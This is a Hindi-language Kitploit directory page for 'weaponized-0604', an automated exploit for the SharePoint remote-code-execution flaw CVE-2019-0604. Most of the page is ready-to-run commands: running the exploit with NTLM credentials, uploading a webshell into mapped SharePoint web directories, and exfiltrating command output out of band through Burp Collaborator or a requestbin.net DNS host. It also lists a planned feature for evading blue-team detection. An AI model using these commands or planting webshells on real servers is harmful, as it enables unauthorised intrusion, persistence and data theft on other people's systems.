Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
weaponized-0604 — शेयरपॉइंट CVE-2019-0604 का शोषण करने के लिए स्वचालित उपकरण | Kitploit
उपकरण/GitHubGitHub/gh0st0ne/weaponized-0604
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubgh0st0ne/weaponized-0604

weaponized-0604

शेयरपॉइंट CVE-2019-0604 का शोषण करने के लिए स्वचालित उपकरण

रिपॉजिटरी देखें
85 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

हथियारबंद CVE-2019-0604

CVE-2019-0604 को अधिकतम करने के लिए स्वचालित शोषण उपकरण।

आवश्यकता

requirements.txt फ़ाइल में इस उपकरण द्वारा उपयोग की जाने वाली सभी Python लाइब्रेरियाँ सूचीबद्ध होनी चाहिए, और उन्हें इसका उपयोग करके स्थापित किया जाएगा

root@kitploit:~
$ pip install -r requirements.txt

मैन्युअल ब्लाइंड शोषण (क्रेडेंशियल के साथ/बिना)

root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -c whoami --ntlm -U <uname>:<passwd>

अपलोड फंक्शन

कुछ भी शानदार अपलोड करें (वेबशेल, recon टूल ...)

root@kitploit:~
Upload cmd.aspx to rcmd.aspx
--file-from /path/to/cmd.aspx --file-to /path/to/web_dir/rcmd.aspx

डायरेक्टरी मैपिंग

root@kitploit:~
Sharepoint Default Web Virtual Dir:
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_app_bin\ -> <target>/_app_bin/
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_vti_pvt\ -> <target>/_vti_pvt/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\layouts\ -> <target>/_layouts/15/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\controltemplates\ -> <target>/_controltemplates/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\login\ -> <target>/_login/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\windows\ -> <target>/_windows/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\wpresources\ -> <target>/_wpresources/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\isapi\ -> <target>/_vti_bin/

OOB का उपयोग करके कमांड परिणाम प्राप्त करें

collaborator_http_api Burp एक्सटेंशन के साथ

  1. BurpSuite (Pro) में collaborator_http_api.py स्थापित करें?

  2. सुनिश्चित करें कि BurpSuite इस शोषण के साथ एक ही मशीन पर चल रहा है।

  3. फायर करें, प्राप्त आउटपुट का आनंद लें :)

root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -c whoami --collab --ntlm -U <uname>:<passwd>

sharepoint-rce-oob-demo

DNSLog जैसे requestbin.net के साथ

root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -r <path/to/reqFile> --oob 8486990041a11aaa43ce.d.requestbin.net -c "whoami /priv"

DNS से डेटा प्राप्त करें

root@kitploit:~
2050524956494c4547455320494e464f524d4154494f4e
...

अपने आप डिकोड करें :)

root@kitploit:~
 PRIVILEGES INFORMATION
...

कार्य सूची

  • आर्गुमेंट पार्सर
  • SharePoint, CVE-2019-0604
  • cmd को कई भागों में विभाजित करें (args.cmds में)
  • आवश्यकतानुसार बाइनरी निर्दिष्ट करें, ब्लू टीम द्वारा पहचान से बचने के लिए। (वर्तमान में cmd.exe हार्डकोडेड)

लेखक

  • Tree
टूल डाउनलोड करें